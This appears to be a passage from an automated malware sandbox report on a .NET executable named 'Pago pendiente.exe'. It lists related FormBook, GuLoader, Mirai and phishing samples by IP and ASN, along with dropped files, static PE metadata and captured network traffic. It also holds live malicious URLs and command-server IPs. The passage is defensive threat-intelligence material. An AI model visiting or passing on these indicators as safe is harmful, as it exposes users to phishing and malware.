                                                        202404153836038.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • 91.195.240.19
                                                        PO# ROSIT#U00a0MR2309040.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • 91.195.240.19
                                                        www.udin88b.usPurchase Order.exeGet hashmaliciousFormBookBrowse
                                                        • 154.83.2.141
                                                        shops.myshopify.comSecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exeGet hashmaliciousFormBookBrowse
                                                        • 23.227.38.74
                                                        DOC 331-100920-00.exeGet hashmaliciousFormBookBrowse
                                                        • 23.227.38.74
                                                        DOC 331-100920-00.exeGet hashmaliciousFormBookBrowse
                                                        • 23.227.38.74
                                                        narud#U017ebenicu 0BH2024.exeGet hashmaliciousFormBookBrowse
                                                        • 23.227.38.74
                                                        MT103 Remittance.vbsGet hashmaliciousFormBookBrowse
                                                        • 23.227.38.74
                                                        http://sellugsk.liveGet hashmaliciousUnknownBrowse
                                                        • 23.227.38.74
                                                        Purchase Order#44231.exeGet hashmaliciousFormBookBrowse
                                                        • 23.227.38.74
                                                        UAyH98ukuA.exeGet hashmaliciousFormBookBrowse
                                                        • 23.227.38.74
                                                        ZNGMn9IDJX.exeGet hashmaliciousFormBookBrowse
                                                        • 23.227.38.74
                                                        5AmzSYESuY.exeGet hashmaliciousFormBookBrowse
                                                        • 23.227.38.74

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        AMAZONEXPANSIONGBOrdem de Compra.pdf.exeGet hashmaliciousFormBookBrowse
                                                        • 3.33.130.190
                                                        https://22apmic22.z13.web.core.windows.net/Get hashmaliciousTechSupportScamBrowse
                                                        • 52.223.40.198
                                                        https://www.ticketlike.fun/Get hashmaliciousUnknownBrowse
                                                        • 3.33.220.150
                                                        Bank Details.pdf.exeGet hashmaliciousFormBookBrowse
                                                        • 3.33.130.190
                                                        tajma.arm7-20240422-0539.elfGet hashmaliciousMirai, OkiruBrowse
                                                        • 52.223.58.75
                                                        https://insight.adsrvr.org/track/clk?imp=df287ca2-348e-4ef4-95b6-18b097ff396b&ag=p58m9rx&sfe=18153e0c&sig=bucGwjsT0boMqfapF3ys659iHXd10oU-bjV9b6_4Zeo.&crid=6kt8s54g&cf=6336093&fq=0&t=1&td_s=sourceforge.net&rcats=7sp&mste=&mfld=4&mssi=&mfsi=&sv=federatedmedia&uhow=50&agsa=&wp=1.092081&rgz=V6B&dt=PC&osf=Windows&os=Windows10&br=Chrome&svpid=223717&rlangs=en&mlang=&did=&rcxt=Other&tmpc=13.78000000000003&vrtd=&osi=&osv=&daid=&dnr=0&vpb=&c=CgZDYW5hZGESEEJyaXRpc2ggQ29sdW1iaWEaACIJVmFuY291dmVyOAFQAYABAYgBAZABAbABALoBBgih4gMYDJICBjM2NDY0ONgCiA7gAogO-AIBgAMCiAMDkAMBmAMEoAM9uAPBygbCAxQH24iSXx67EhZUq4XVXDtGqPPXTQ..&dur=CiMKDmNoYXJnZS1hbGwtMTIyIhEIhv__________ARIEaWF2MgpjCgc3dWluZTd4EJimBSIXCJey-qABEg9kYTkyMzI5YXVkaWdlbnQiOwiXsvqgARINZHIxMTNhdWRpZ2VudEIkOWYzZDAzYWMtOGI0MC00YmNlLTk0N2ItZDczYTFiZjNkNjZmCj4KIWNoYXJnZS1tYXhEb3VibGVWZXJpZnlCcmFuZFNhZmV0eSIZCPH__________wESDGRvdWJsZXZlcmlmeQowCgxjaGFyZ2UtYWxsLTEiIAj___________8BEhN0dGRfZGF0YV9leGNsdXNpb25zEJimBTIkOWYzZDAzYWMtOGI0MC00YmNlLTk0N2ItZDczYTFiZjNkNjZmOAE.&durs=L4Cb61&crrelr=&npt=&testid=iavc1%20&fpa=546&pcm=3&ict=Unknown&said=d25d7c3f-8a89-4349-b8cc-15f285ed17c0&auct=1&tail=1&r=https://cf-ipfs.com/ipfs/QmW3CaJMeTL4Z1WhsR8kFQWUND47rYZXMSNdwezX7aMqJs/#assetcoordinator@bluestarindia.comGet hashmaliciousHTMLPhisherBrowse
                                                        • 3.33.220.150
                                                        https://19apmic17.z13.web.core.windows.net/Get hashmaliciousTechSupportScamBrowse
                                                        • 3.33.220.150
                                                        https://19apmic11.z13.web.core.windows.net/Get hashmaliciousTechSupportScamBrowse
                                                        • 3.33.220.150
                                                        FFE Order details - Cincy v41720.xlsxGet hashmaliciousUnknownBrowse
                                                        • 3.33.220.150
                                                        FFE Order details - Cincy v41720.xlsxGet hashmaliciousUnknownBrowse
                                                        • 3.33.220.150
                                                        UNMETEREDCAv6SEx6rJ3E.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, Stealc, VidarBrowse
                                                        • 38.147.122.254
                                                        file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                        • 38.147.122.253
                                                        SecuriteInfo.com.FileRepMalware.4269.6620.exeGet hashmaliciousUnknownBrowse
                                                        • 154.12.35.37
                                                        ckS92jgGGm.elfGet hashmaliciousMiraiBrowse
                                                        • 38.147.250.143
                                                        VFSJUqK11j.elfGet hashmaliciousMiraiBrowse
                                                        • 38.147.22.98
                                                        uCEcm0sVMK.elfGet hashmaliciousMiraiBrowse
                                                        • 38.147.202.241
                                                        Fr2X6xwNNK.elfGet hashmaliciousUnknownBrowse
                                                        • 38.147.26.128
                                                        S2So6J38N6.elfGet hashmaliciousMiraiBrowse
                                                        • 154.12.57.120
                                                        Q017PzM46q.elfGet hashmaliciousMiraiBrowse
                                                        • 154.12.57.120
                                                        R3jiSIIDrx.elfGet hashmaliciousMiraiBrowse
                                                        • 154.12.57.120
                                                        TRELLIAN-AS-APTrellianPtyLimitedAUhttp://husbeu.com/jr.php?gz=oo7zX8EiulTjhhAsh5xwKH49fjR0dlg4dE9pUzh2dHZQTDNtcE9kMlBqWkVUcUFWQVEzbmF1SXgxUUR1WjRQZEhVUmZoMXJoQ1MrMkdpQVFaVFNKVk9rMUViMVpyRWNQTldmQXNidmpoUnVjcDg2Y0RTNTl5eFA4REMrMDlZeGlxc29YOGQzRlFHSTluczBmdEpKZVV4V2dyamZiVkNYOVFRb3JTZW1SWmMyQ0hBd0dIb0ZyZ1pGaGpFKzFhVVNyRXNmdnZuMUt6L2NYbWhabVVwd0tkZWg5TXVHc2hrdWVOK0YrbGN5dEpRc1dNU0Z2U2hkZUpjTUZjenQ1RWUwZ05SQ2JOQnhUbmM2Y1B0MHVKSFBnN294SlloSzRiQjBhMFBjZVRoSEJsT2xsbnUrWGhvSXF4T1RER0EwQWN3bTlrMG1KT29DNGk3SDRiLzlMLzk5ZmZiR2hsWno0WE9oTjhnLy9ienVxaFluTmlMWm4yUE8yd1htd3dxS0FSaWY2Slp5OEhiSmRRSzlyRjlIdmRXTzV6UlI5T1VQT003K2R6c2JwRm93eTFxTVB3R1ROVDBxOHVXN1NQSkV3QlNJUExMUzNndUJQdFpmdllvcUh1MHFWWHZCc25kYjE5VFhvS2Z1Z01hWjNhUjZ5ZysyT0xhWExMOW5taStGNFpEbnArdnhjOUYzZDN5RlZ2S1Vwc1NxTElFOVdCT0grNThjRElyOFYzT0piZUlDbGtTbTE0UmtkSk0yc3REUjZrS1FJamtidVg3amVXd0FnVWNwek02cFc3RkZ0dE9rUk5Ta3d1TmV0NkduWjZibjFsc1pWVFVZMUNRMnpHQkp6cTJYU2tEVGNHY2s4cGo5cGZyYmM4RkJxMXhlMk5OUkRZMWhMMDlQZTJna2JDQmJ2RVByUnBkbWZmRDhyK1I3b2tRcXc5b3B4UjBYOVlIUXY0U1A3eHdqT2Q0a2hCTElBRUdNbExZam1HU1Qyc0pucTMrS0VtdDhlcHJhNFk5M1QzWXhHcVVFUXFwNDhPbEhZNTBOQTlVbGg3UVZUcGxXOXNudjhid0FCR3Qxd0FkMllldGpWS2E3OXQ3WGo3RHovU2JYVkFFbFpUcERkem4xN0QwMTBnM1p4bGh4TU51Q2N1SmpmYjFtRVpsM25tTk9KR3h1Z1lvVmFSZ01zQU1ramtrYWdYUkZMSnJEUy9mWmovWEwrRk56SExMSHpaVjBsaFNNUEVkeTVrSmdCL3pzbkpCMTl0TDFwaW16TGZ5dDFOazMvVS9xdzlQaXlkSUhKUGhHNlV3bA%3D%3D&vs=1920:945&ds=1920:1080&sl=1:1&os=f&nos=f&if=f&sc=f&gpu=Google%20Inc.%20(Google)%20-%20ANGLE%20(Google,%20Vulkan%201.3.0%20(SwiftShader%20Device%20(Subzero)%20(0x0000C0DE)),%20SwiftShader%20driver)&anura_res=Get hashmaliciousUnknownBrowse
                                                        • 103.224.182.206
                                                        615.exeGet hashmaliciousNetWireBrowse
                                                        • 103.224.212.210
                                                        http://www.outdooradventuresinc.comGet hashmaliciousUnknownBrowse
                                                        • 103.224.182.238
                                                        https://rxplusmart.su/Get hashmaliciousUnknownBrowse
                                                        • 103.224.212.214
                                                        http://www.outdooradventuresinc.comGet hashmaliciousUnknownBrowse
                                                        • 103.224.182.238
                                                        HTTP://PEPJOB.COM/JOBSEEKERS/TOOLS/VALUESTEST.HTMGet hashmaliciousUnknownBrowse
                                                        • 103.224.182.240
                                                        Dokument-99373.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 103.224.212.217
                                                        http://pepjob.com/jobseekers/tools/valuestest.htmGet hashmaliciousUnknownBrowse
                                                        • 103.224.182.240
                                                        http://engcabs.comGet hashmaliciousUnknownBrowse
                                                        • 103.224.182.242
                                                        http://rfq.engcabs.comGet hashmaliciousUnknownBrowse
                                                        • 103.224.182.242

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Pago pendiente.exe.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\Pago pendiente.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1415
                                                        Entropy (8bit):5.352427679901606
                                                        Encrypted:false
                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRuAE4KzecKIE4oKNzKorE4x84j:MIHK5HKH1qHiYHKh3oPHKMRuAHKzectP
                                                        MD5:3978978DE913FD1C068312697D6E5917
                                                        SHA1:1DABBE7FB8F38F6EBF474CE5F0ECAA89F48E2538
                                                        SHA-256:33B7B1668DDD3AB39711F9F93B667F6F2F674348A79228BFA163BA625B37F120
                                                        SHA-512:78694B97F5D03758F503155E5CE5B85AABDF9690F0DFBC51FCE9926BE2D86BCF99E008659420F1E8489A7F6EA125F2776D4C6DC4B151566B529454512352953D
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll"

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1172
                                                        Entropy (8bit):5.357042452875322
                                                        Encrypted:false
                                                        SSDEEP:24:3CytZWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NKIl9r6dj:yyjWSU4y4RQmFoUeWmfmZ9tK8NDE
                                                        MD5:475D428E7231D005EEA5DB556DBED03F
                                                        SHA1:3D603ED4280E0017D1BEB124D68183F8283B5C22
                                                        SHA-256:1314488A930843A7E1A003F2E7C1D883DB44ADEC26AC1CA096FE8DC1B4B180F5
                                                        SHA-512:7181BDCE6DA8DA8AFD3A973BB2B0BA470468EFF32FFB338DB2662FEFA1A7848ACD87C319706B95401EA18DC873CA098DC722EA6F8B2FD04F1AABD2AEBEA97CF9
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview:@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4hq5muto.t5w.ps1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_55p0e2oa.xna.psm1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iofqxz1p.z2x.ps1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rjup3hke.pmc.psm1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):7.93284965265028
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        • DOS Executable Generic (2002/1) 0.01%
                                                        File name:Pago pendiente.exe
                                                        File size:624'640 bytes
                                                        MD5:9a308e1ea62b7ede8876e433178957d1
                                                        SHA1:dac00f0068f3f97a71faf15577ce0c7d855ff691
                                                        SHA256:ae300b28b2240d11d01e9066a26a88349258d4016c41460604c9ff5bb64c9b6d
                                                        SHA512:6bd4ac59b7f6f1a49ce9150507dcb2fee3292e4286b76f2954bf08492bce21ebf1ac93be1e1c0e267cfea9d16fd45188bc5e2894f17926f1ad67d6a0fc75e07a
                                                        SSDEEP:12288:6SnBB6f5+Zq7aXVZm/1u2eo45hx5BEW3piNHmbWW66T5Lp:6uB60q7yVYeD5hx5npgmbT66Tn
                                                        TLSH:5BD4121835563F95E03FABB5543A652003B1A57DF631E6EEDFC220D72C21F809A62B27
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R.'f.................~............... ........@.. ....................................@................................

                                                        File Icon

                                                        Icon Hash:00928e8e8686b000

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x499d8e
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x66279E52 [Tue Apr 23 11:41:06 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x99d400x4b.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x9a0000x600.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x9c0000xc.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x20000x97d940x97e0034b7125ee61a3bdf564624f315cff97eFalse0.95473733281893data7.9402587845762955IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rsrc0x9a0000x6000x6004805845c124c5811cc5ac75858cb0c76False0.423828125data4.1134333382521575IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0x9c0000xc0x200f6503e8d8cef9b0e5808b5f8dee3290aFalse0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_VERSION0x9a0900x32cdata0.4273399014778325
                                                        RT_MANIFEST0x9a3cc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                        Imports

                                                        DLLImport
                                                        mscoree.dll_CorExeMain

                                                        Network Behavior

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Apr 23, 2024 14:20:35.009872913 CEST4971780192.168.2.5103.224.212.216
                                                        Apr 23, 2024 14:20:35.162107944 CEST8049717103.224.212.216192.168.2.5
                                                        Apr 23, 2024 14:20:35.162353039 CEST4971780192.168.2.5103.224.212.216
                                                        Apr 23, 2024 14:20:35.162353039 CEST4971780192.168.2.5103.224.212.216
                                                        Apr 23, 2024 14:20:35.355041981 CEST8049717103.224.212.216192.168.2.5
                                                        Apr 23, 2024 14:20:35.358288050 CEST8049717103.224.212.216192.168.2.5
                                                        Apr 23, 2024 14:20:35.358309031 CEST8049717103.224.212.216192.168.2.5
                                                        Apr 23, 2024 14:20:35.358603001 CEST4971780192.168.2.5103.224.212.216
                                                        Apr 23, 2024 14:20:35.358603001 CEST4971780192.168.2.5103.224.212.216
                                                        Apr 23, 2024 14:20:35.510773897 CEST8049717103.224.212.216192.168.2.5
                                                        Apr 23, 2024 14:20:55.670691967 CEST4971980192.168.2.53.33.130.190
                                                        Apr 23, 2024 14:20:55.774871111 CEST80497193.33.130.190192.168.2.5
                                                        Apr 23, 2024 14:20:55.777256966 CEST4971980192.168.2.53.33.130.190
                                                        Apr 23, 2024 14:20:55.777256966 CEST4971980192.168.2.53.33.130.190
                                                        Apr 23, 2024 14:20:55.881522894 CEST80497193.33.130.190192.168.2.5
                                                        Apr 23, 2024 14:20:55.902518988 CEST80497193.33.130.190192.168.2.5
                                                        Apr 23, 2024 14:20:55.902630091 CEST80497193.33.130.190192.168.2.5
                                                        Apr 23, 2024 14:20:55.902748108 CEST4971980192.168.2.53.33.130.190
                                                        Apr 23, 2024 14:20:55.902833939 CEST4971980192.168.2.53.33.130.190
                                                        Apr 23, 2024 14:20:55.908016920 CEST80497193.33.130.190192.168.2.5
                                                        Apr 23, 2024 14:20:55.908080101 CEST4971980192.168.2.53.33.130.190
                                                        Apr 23, 2024 14:20:56.009463072 CEST80497193.33.130.190192.168.2.5
                                                        Apr 23, 2024 14:21:58.590886116 CEST4972180192.168.2.5154.12.38.29
                                                        Apr 23, 2024 14:21:58.737698078 CEST8049721154.12.38.29192.168.2.5
                                                        Apr 23, 2024 14:21:58.737776041 CEST4972180192.168.2.5154.12.38.29
                                                        Apr 23, 2024 14:21:58.737889051 CEST4972180192.168.2.5154.12.38.29
                                                        Apr 23, 2024 14:21:58.884149075 CEST8049721154.12.38.29192.168.2.5
                                                        Apr 23, 2024 14:21:58.885886908 CEST8049721154.12.38.29192.168.2.5
                                                        Apr 23, 2024 14:21:58.885921955 CEST8049721154.12.38.29192.168.2.5
                                                        Apr 23, 2024 14:21:58.886042118 CEST4972180192.168.2.5154.12.38.29
                                                        Apr 23, 2024 14:21:58.886075020 CEST4972180192.168.2.5154.12.38.29
                                                        Apr 23, 2024 14:21:59.032239914 CEST8049721154.12.38.29192.168.2.5
                                                        Apr 23, 2024 14:23:41.401406050 CEST4972480192.168.2.53.33.130.190
                                                        Apr 23, 2024 14:23:41.505496025 CEST80497243.33.130.190192.168.2.5
                                                        Apr 23, 2024 14:23:41.505726099 CEST4972480192.168.2.53.33.130.190
                                                        Apr 23, 2024 14:23:41.505845070 CEST4972480192.168.2.53.33.130.190
                                                        Apr 23, 2024 14:23:41.609848976 CEST80497243.33.130.190192.168.2.5
                                                        Apr 23, 2024 14:23:41.627742052 CEST80497243.33.130.190192.168.2.5
                                                        Apr 23, 2024 14:23:41.627758026 CEST80497243.33.130.190192.168.2.5
                                                        Apr 23, 2024 14:23:41.630424023 CEST4972480192.168.2.53.33.130.190
                                                        Apr 23, 2024 14:23:41.630522966 CEST4972480192.168.2.53.33.130.190
                                                        Apr 23, 2024 14:23:41.633593082 CEST80497243.33.130.190192.168.2.5
                                                        Apr 23, 2024 14:23:41.633913040 CEST4972480192.168.2.53.33.130.190
                                                        Apr 23, 2024 14:23:41.734636068 CEST80497243.33.130.190192.168.2.5

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Apr 23, 2024 14:20:34.506072998 CEST5003553192.168.2.51.1.1.1
                                                        Apr 23, 2024 14:20:35.009041071 CEST53500351.1.1.1192.168.2.5
                                                        Apr 23, 2024 14:20:55.410773993 CEST5952453192.168.2.51.1.1.1
